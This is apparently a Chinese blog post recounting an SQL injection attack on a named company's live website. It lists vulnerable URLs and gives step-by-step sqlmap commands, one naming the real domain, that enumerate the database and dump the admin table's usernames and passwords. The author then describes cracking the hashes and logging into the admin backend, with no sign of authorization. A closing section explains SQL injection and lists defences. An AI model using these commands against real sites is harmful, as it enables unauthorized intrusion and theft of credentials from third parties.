记一次对真实网站的SQL注入实战

youhao108

已于 2022-08-20 19:38:04 修改

阅读量6.5k

点赞数 8

CC 4.0 BY-SA版权

分类专栏：网络攻防文章标签： sql 安全渗透测试 web

于 2021-03-31 17:33:13 首次发布

本文链接：https://blog.csdn.net/qq_43678263/article/details/115355325

网络攻防专栏收录该内容

13 篇文章

订阅专栏

本文详述了一次SQL注入漏洞的发现过程，利用sqlmap工具进行渗透测试，揭示了网站存在的安全隐患。通过实例解释了SQL注入攻击原理，并提出了防止SQL注入的措施，包括用户权限管理、参数化查询和输入过滤等。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

前言

某集团股份有限公司网站存在SQL注入漏洞

发现过程

用针对性工具扫描（这里使用的是超级SQL注入工具）问题网站，得到以下链接均存在SQL注入漏洞
问题URL：
fuwu_fanwei.php?fid=1
fuwu_zhichi.php?zid=5
video.php?video_id=1
news.php?nid=1
about.php?aid=1
fuwu_fanwei_content.php?fid=1&id=1

在这里插入图片描述

漏洞利用

这里使用sqlmap进行注入
sqlmap -u XX/fuwu_fanwei.php?fid=1 --dbs –batch
检测库：
在这里插入图片描述
sqlmap -u XX/fuwu_fanwei.php?fid=1 --tables -D sq_zhengxing1
检测sq_zhengxing1库中表：

sqlmap -u XX/fuwu_fanwei.php?fid=1 --column -T adminuser -D sq_zhengxing1
检测adminuser表中字段：
在这里插入图片描述

sqlmap -u http://shzxjsjt.com/fuwu_fanwei.php?fid=1 -C username/password -T adminuser -D sq_zhengxing1 –dump
检测username和password的值：
在这里插入图片描述

最后破解哈希还得到了弱口令
工具扫描获得后台地址：

利用弱口令成功登录：

在这里插入图片描述

总结

SQL注入攻击是通过操作输入来修改SQL语句，用以达到执行代码对WEB服务器进行攻击的方法。简单的说就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令，最终使web服务器执行恶意命令的过程。可以通过一个例子简单说明SQL注入攻击。假设某网站页面显示时URL为http://www.example.com?test=123，此时URL实际向服务器传递了值为123的变量test，这表明当前页面是对数据库进行动态查询的结果。由此，我们可以在URL中插入恶意的SQL语句并进行执行。另外，在网站开发过程中，开发人员使用动态字符串构造SQL语句，用来创建所需的应用，这种情况下SQL语句在程序的执行过程中被动态的构造使用，可以根据不同的条件产生不同的SQL语句，比如需要根据不同的要求来查询数据库中的字段。这样的开发过程其实为SQL注入攻击留下了很多的可乘之机。
解决SQL注入的方法有：
1.对用户进行分级管理，严格控制用户的权限。
2.禁止将变量直接写入到SQL语句，必须通过设置相应的参数来传递相关的变量。
3.获取用户输入提交的参数时，首先要进行基础过滤，然后根据程序的功能及用户输入的可能性进行二次过滤。
4.程序编写时应尽量使用安全参数来杜绝注入式攻击。